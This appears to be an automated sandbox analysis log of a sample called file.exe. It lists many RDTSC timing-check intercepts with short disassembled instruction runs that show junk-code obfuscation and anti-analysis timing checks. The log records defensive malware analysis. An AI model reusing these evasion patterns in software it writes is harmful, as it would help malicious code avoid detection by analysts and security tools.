                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DDDA second address: 107DDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B3150 second address: 10B3167 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D106F7661h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B3167 second address: 10B317E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9D1073AE6Ch 0x00000008 pushad 0x00000009 jns 00007F9D1073AE66h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B317E second address: 10B319A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D106F7660h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B319A second address: 10B31A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B31A0 second address: 10B31B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007F9D106F7656h 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B3326 second address: 10B3330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B3330 second address: 10B3335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B3335 second address: 10B333A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B64C9 second address: 10B64CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6B19 second address: 10B6B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6B1D second address: 10B6B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9D106F765Ah 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6B30 second address: 10B6B4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007F9D1073AE66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 jl 00007F9D1073AE66h 0x0000001d popad 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6B4E second address: 10B6B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F9D106F7658h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6B62 second address: 10B6B69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7E83 second address: 10B7E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F9D106F765Eh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7E99 second address: 10B7EC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE72h 0x00000007 pushad 0x00000008 jmp 00007F9D1073AE6Eh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10757D5 second address: 10757F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F9D106F7665h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10757F2 second address: 10757FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10757FA second address: 1075804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BF96C second address: 10BF972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BF011 second address: 10BF016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BF12E second address: 10BF141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9D1073AE66h 0x0000000a pop ebx 0x0000000b js 00007F9D1073AE6Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BF509 second address: 10BF50F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BF50F second address: 10BF53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9D1073AE7Eh 0x0000000a je 00007F9D1073AE8Ch 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BF53A second address: 10BF557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9D106F765Ch 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F9D106F7656h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C01FE second address: 10C0203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C0CDB second address: 10C0D2A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9D106F7665h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jc 00007F9D106F765Ch 0x00000012 jp 00007F9D106F7656h 0x00000018 jno 00007F9D106F7662h 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 mov esi, dword ptr [ebp+122D21DDh] 0x00000026 nop 0x00000027 pushad 0x00000028 jbe 00007F9D106F7658h 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 pop eax 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C0D2A second address: 10C0D54 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9D1073AE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F9D1073AE79h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C0D54 second address: 10C0D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C0E1F second address: 10C0E23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C0E23 second address: 10C0E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1297 second address: 10C129B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C132A second address: 10C1330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1330 second address: 10C136A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F9D1073AE68h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 adc edi, 227AFA9Fh 0x0000002b mov edi, dword ptr [ebp+122D2980h] 0x00000031 push eax 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 push ecx 0x00000036 pop ecx 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C17CB second address: 10C17CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C17CF second address: 10C181A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F9D1073AE68h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a pop esi 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e jbe 00007F9D1073AE68h 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C181A second address: 10C1848 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9D106F765Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F9D106F7667h 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1848 second address: 10C184E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C21AA second address: 10C21C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D106F7664h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C21C2 second address: 10C21C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C21C6 second address: 10C21D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F9D106F7656h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C21D9 second address: 10C21EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C321A second address: 10C3220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C3C7D second address: 10C3D1A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9D1073AE77h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F9D1073AE75h 0x00000012 jc 00007F9D1073AE77h 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F9D1073AE68h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D21E6h], ecx 0x0000003a mov dword ptr [ebp+122DB7F2h], edi 0x00000040 push 00000000h 0x00000042 mov si, di 0x00000045 push 00000000h 0x00000047 sub edi, 7AA87D17h 0x0000004d xchg eax, ebx 0x0000004e push edi 0x0000004f jmp 00007F9D1073AE70h 0x00000054 pop edi 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push edi 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C3D1A second address: 10C3D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C50E4 second address: 10C50EE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9D1073AE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C50EE second address: 10C50FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9D106F765Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C50FD second address: 10C5139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F9D1073AE68h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 clc 0x00000023 mov dword ptr [ebp+122D34B8h], edi 0x00000029 push 00000000h 0x0000002b mov di, bx 0x0000002e push 00000000h 0x00000030 mov si, 9CB7h 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C65F2 second address: 10C6607 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F7661h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8237 second address: 10C8252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D1073AE6Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F9D1073AE66h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8252 second address: 10C8256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C8256 second address: 10C825C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C825C second address: 10C8272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9D106F765Fh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CC46B second address: 10CC48F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9D1073AE7Ah 0x00000008 jmp 00007F9D1073AE74h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD2CA second address: 10CD2CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CC48F second address: 10CC49F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D1073AE6Bh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD2CE second address: 10CD2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD2D8 second address: 10CD2DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CE218 second address: 10CE222 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9D106F7656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD42D second address: 10CD4BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F9D1073AE66h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov bx, 9446h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F9D1073AE68h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 cmc 0x00000037 or edi, dword ptr [ebp+122D1C35h] 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 xor dword ptr [ebp+122D26D2h], edx 0x0000004a mov eax, dword ptr [ebp+122D05A1h] 0x00000050 movsx ebx, si 0x00000053 push FFFFFFFFh 0x00000055 call 00007F9D1073AE70h 0x0000005a jo 00007F9D1073AE6Ch 0x00000060 mov dword ptr [ebp+122D1CEEh], edi 0x00000066 pop ebx 0x00000067 push ebx 0x00000068 xor bl, FFFFFFE1h 0x0000006b pop edi 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F9D1073AE74h 0x00000074 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF2B9 second address: 10CF2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CF2BD second address: 10CF2C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0F56 second address: 10D0F6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9D106F765Dh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2E19 second address: 10D2E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D1073AE75h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D2E39 second address: 10D2E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F9D106F7656h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D4FA4 second address: 10D4FD1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F9D1073AE7Fh 0x00000014 jmp 00007F9D1073AE79h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D4FD1 second address: 10D4FD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D4FD7 second address: 10D5020 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9D1073AE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F9D1073AE68h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+122D2044h] 0x0000002d push 00000000h 0x0000002f mov edi, dword ptr [ebp+122D291Ch] 0x00000035 push 00000000h 0x00000037 mov di, E85Ah 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6097 second address: 10D609D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D609D second address: 10D60A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D60A1 second address: 10D60A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D60A5 second address: 10D60FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F9D1073AE6Ah 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F9D1073AE68h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push edi 0x0000002f pop ebx 0x00000030 push 00000000h 0x00000032 jmp 00007F9D1073AE70h 0x00000037 push 00000000h 0x00000039 mov dword ptr [ebp+122D27DDh], ecx 0x0000003f xchg eax, esi 0x00000040 push esi 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D60FF second address: 10D610D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D610D second address: 10D6112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6112 second address: 10D6118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D62FE second address: 10D6302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D72D3 second address: 10D72D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D72D8 second address: 10D730A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F9D1073AE6Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107F9F9 second address: 107F9FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107F9FD second address: 107FA01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107FA01 second address: 107FA0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107FA0D second address: 107FA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
